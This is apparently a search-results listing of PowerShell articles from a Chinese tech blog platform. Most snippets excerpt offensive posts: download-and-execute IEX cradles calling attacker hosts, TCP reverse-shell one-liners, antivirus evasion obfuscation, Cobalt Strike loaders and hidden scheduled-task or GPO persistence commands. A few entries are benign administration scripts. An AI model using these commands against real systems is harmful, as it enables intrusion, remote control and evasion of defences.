  • From the column 文渊之博

    How to access SQL Server with PowerShell

    = 'SecretPassword' $SqlQuery = 'Select * FROM TestTable' # Accessing Data Base $SqlConnection = New-Object System.Data.SqlClient.SqlDataAdapter $SqlAdapter.SelectCommand       = $SqlCmd $set = New-Object data.dataset Server = '"WIN-AHAU9NO5R6U\DOG"' $UserName = 'kk' $Password = '123456' #create the connection object $SqlConn = New-Object Initial Catalog=$Database;Integrated Security=SSPI;" #open the database connection $SqlConn.open() #execute a statement, method 1 $SqlCmd = New-Object System.Data.SqlClient.SqlDataAdapter $SqlAdapter.SelectCommand = $SqlCmd $set = New-Object data.dataset

    1.2K50 Edited on 2022-05-06
  • From the column 七夜安全博客

    Thoughts on APT: advanced adversarial PowerShell command obfuscation

    Inv`o`ke-Ex`pr`e`s`sion (`New-Object `System. Invoke-Expression (New-Object System.Net.WebClient).' IEX (New-Object Net.WebClient).("DownloadString").Invoke("http://127.0.0.1:8899/qiye.txt") 4. IEX (New-Object Net.WebClient). ($ExecutionContext.InvokeCommand.NewScriptBlock('IEX (New-Object Net.WebClient).

    7.1K52 Published on 2020-06-05
  • From the column FreeBuf

    PowerShell AV evasion from the basics to practice

    Taking on-disk execution as an example: powershell -ExecutionPolicy bypass -File a.ps1 Taking fileless execution as an example, such as the well-known IEX: powershell -c "IEX(New-Object /a') | powershell - e.g.: powershell -c "IEX(New-Object Net.WebClient).DownloadString('d://a')" Simple obfuscation: powershell Net.WebClient).DownloadString("http://109.xx.xx/a") ^|%p1%%p2% -" e.g.: echo Invoke-Expression (New-Object The client runs the command: powershell -c "$client = New-Object Net.Sockets.TCPClient('106.xxx.xxx.xxx',9090);$stream = $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("xxx"));IEX (New-Object IO.StreamReader(New-Object

    3.3K30 Published on 2021-03-09
  • From the column 潇湘信安

    Tricks for evading 360 and Huorong (火绒) in PowerShell

    0x02 PowerShell AV evasion: getting a beacon online past 360 and Huorong. Reference for the PowerShell evasion approach: Anquanke (安全客) original payload Invoke-Expression (New-Object Net.WebClient ("ht"+"tp://9821.ink/xxx") Variable substitution IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink Invoke-Expression (New-Object Net.WebClient)." Down`loadString"('h'+'ttp://9821.ink/xxx') The same can be applied to Net.Webclient Invoke-Expression(New-Object "`Ne`T Modified command: powershell -c "IEX(New-Object Net.WebClient)."

    2.3K31 Published on 2021-07-28
  • From the column 中国白客联盟

    Commonly used PowerShell in penetration testing (Part 1)

    Port scanning: multi-port scan against a single IP 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port Jumbo\Desktop>whoami whoami desktop-ej8rt6l\jumbo Export rdp/winscp/putty/FileZilla sessions and passwords powershell IEX (New-Object NC reverse shell powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose File download powershell (new-object Copy system/ntds powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com

    2.1K40 Published on 2019-03-07
  • From the column 黑白天安全团队

    Some interesting PowerShell loading commands

    Plain download IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") PowerShell 3.0+ IEX (iwr ' http://EVIL/evil.ps1') Hidden IE COM object $ie=New-Object -comobject InternetExplorer.Application; $ie.visible evil.ps1'); start-sleep -s 5; $r=$ie.Document.body.innerHTML; $ie.quit(); IEX $r Msxml2.XMLHTTP COM object $h=New-Object $ h = new-object -com WinHttp.WinHttpRequest.5.1; $ h.open('GET',' http://EVIL/evil.ps1',$false); $ > <command> <execute>Get-Process</execute> </command> #> $a = New-Object System.Xml.XmlDocument

    1.8K10 Published on 2021-03-16
  • From the column 鸿鹄实验室

    Bypass Windows Defender Reverse Shell

    " PS C:\Users\Administrator> Write-Host $replace 0x02 Hands-on bypass: we take reverse shell code as the example for a hands-on bypass; the code is as follows: $sm=(New-Object ',55555)).GetStream(); [byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object Looking closely at the code, we can try changing the sensitive words in it, for example to the following: $sm=(New-Object Net.Sockets.TCPClient('192.168.2.114',4444)).GetStream (); [byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object Text.ASCIIEncoding $sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close() $client = New-Object

    1.4K40 Published on 2021-04-15
  • From the column 潇湘信安

    Abusing the sqlps.exe whitelist (gets past S60!)

    Blocked: powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 /360.ps1'))" SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 Bypass method: SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/ 360.ps1'))" cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 @shell output exec sp_oamethod @shell,'run',null,'C:\ProgramData\SQLPS.exe -nop -w hidden -c "IEX ((new-object

    1.5K10 Edited on 2022-04-01
  • From the column 鸿鹄实验室

    Fetching data over UDP with PowerShell

    nc -lnvup 53 powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient

    2.3K30 Published on 2021-04-15
  • From the column FreeBuf

    Analyzing a banking trojan's malicious shortcut and obfuscated PowerShell

    echo iEx(iEx(NEw-obJect NeT.wEbcLient).downLOadStRiNG('https://s3-eu-west-1.amazonaws.com/juremasobra2 function downloadFileAndWriteToFile(${url}, ${argumentList}) { ${uri} = New-Object $('System.Uri' -TypeName System.IO.FileStream -ArgumentList ${argumentList}, Create ${arrayToWrite} = new-object function _/=\/\_/\/===\_/== { try { ${_/======\_/\/=\/\} = New-Object System.Threading.Mutex( function mutexCheck { try { ${threadingMutex} = New-Object System.Threading.Mutex($false, $('

    2K20 Published on 2019-11-12
  • From the column ConsT27的笔记

    A compilation of common commands for Windows internal network penetration

    besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd powershell IEX (New-Object ;$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} (deluxe version) $client = New-Object [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object "";document.write();r=new%20ActiveXObject(""WScript.Shell"").run(""powershell -w h -ep bypass `$sm=(New-Object net.webclient).downloadstring('http://xxx/a.ps1')) powershell -exec bypass -c "(New-Object Net.WebClient

    2.2K30 Edited on 2022-02-11
  • From the column 黑白天安全团队

    Cobalt Strike PowerShell: getting a beacon online past 360, Defender and other AV

    System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod( System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod( IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object

    3.2K20 Published on 2020-11-03
  • From the column 运维开发王义杰

    Windows: remotely changing another user's password with an ordinary domain user's credentials

    Password change $username = "wang\w" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object username = "wang\yijie" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object $username = "wang\yijie" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object This is implemented through the New-Object cmdlet and the System.Management.Automation.PSCredential class. $username = "wang\w" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object

    1.2K40 Edited on 2023-11-07
  • From the column 网络安全攻防

    Various ways to get a reverse shell in a Windows environment

    On the attacker side, host a PowerShell file with python: python2 -m SimpleHTTPServer 1234 Step 3: the target machine sends back a cmd shell powershell IEX (New-Object lnvp 4444 Step 2: on the attacker side, host the file with python: python2 -m SimpleHTTPServer 1234 Step 3: reverse shell operation powershell IEX (New-Object lup 6666 Step 2: on the attacker side, host the file with python: python2 -m SimpleHTTPServer 1234 Step 3: reverse shell operation powershell IEX (New-Object icmp packets python2 icmpsh_m.py 192.168.204.144 192.168.204.145 #start listening Step 3: reverse shell operation powershell IEX (New-Object [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object

    2.2K11 Edited on 2025-01-07
  • From the column Windows技术交流

    How to work around the bug where a custom image made from an instance type A machine whose init component is cloudbase-init ≤ 1.1.2, used to purchase an instance type B machine, leaves the new machine with broken network initialization

    add "HKLM\SYSTEM\CurrentControlSet\Control\Network\NewNetworkWindowOff" /f 2>&1 > $null $client = new-object remove "PCI\VEN_1AF4&DEV_1000&SUBSYS_00011AF4&REV_00" ② Upgrade cloudbase-init to 1.1.4 (the machine needs public internet access) #ps1 $client = new-object 1 > $null sc.exe qc cloudbase-init 8192 net user cloudbase-init /del 2>$null #$client12 = new-object 1251783334.cos.ap-guangzhou.myqcloud.com/ziyan/Cloudbase-Init.zip','C:\Cloudbase-Init.zip') #$client14 = new-object Cloudbase-Init.zip') $7zPath = "$env:ProgramFiles\7-Zip\7z.exe" if (-not (Test-Path -Path $7zPath)) { $client7 = new-object

    34510 Edited on 2025-01-14
  • From the column 信安之路

    Using scheduled tasks to maintain system privileges

    WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

    1.4K30 Published on 2021-05-27
  • From the column 全栈工程师修炼之路

    Common PowerShell commands for object handling

    Command - create a new object. Description: creates an instance of a Microsoft .NET Framework or COM object through the New-Object cmdlet; you can specify the type of a .NET Framework class (the default) or a COM PS > $obj = New-Object object #empty object # 1. Use the String class with a character and a count to create a string containing the specified number of characters PS > New-Object String("*", $IE2 = New-Object -COMObject InternetExplorer.Application` $IE2.Navigate2("www.microsoft.com")` $IE2. New-Object -ComObject WScript.Shell New-Object -ComObject WScript.Network New-Object -ComObject Scripting.Dictionary New-Object -ComObject Scripting.FileSystemObject Add-Member command - adds custom properties and methods to an instance of a PowerShell object.

    10.7K11 Edited on 2022-09-29
  • From the column FreeBuf

    How to take control of objects governed by a Group Policy Object (GPO) through a user's edit permission

    AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I EX ((new-object

    1.8K20 Edited on 2023-04-26
  • From the column Windows技术交流

    Automatically installing and configuring Windows cloudbase-init 1.1.6 with PowerShell on Tencent Cloud to build a custom image

    2008R2; neither 1.1.4 nor 1.1.6 applies) Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object cloudbase-init1.1.6.ps1 Install TAT Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object tat_agent_installer.exe Install the Cloud Monitor component Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object

    41810 Edited on 2025-08-21
  • From the column jiajia_deng

    Auto-update script for the Windows Sysinternals tools

    ToolsLocalDir){ cd $ToolsLocalDir $DebugPreference = "SilentlyContinue" $wc = new-object *" $WebPageCulture = New-Object System.Globalization.CultureInfo("en-us") $Tools $NeedUpdate=$false if (Test-Path $_) { $SubtractSeconds = New-Object

    44320 Edited on 2023-10-21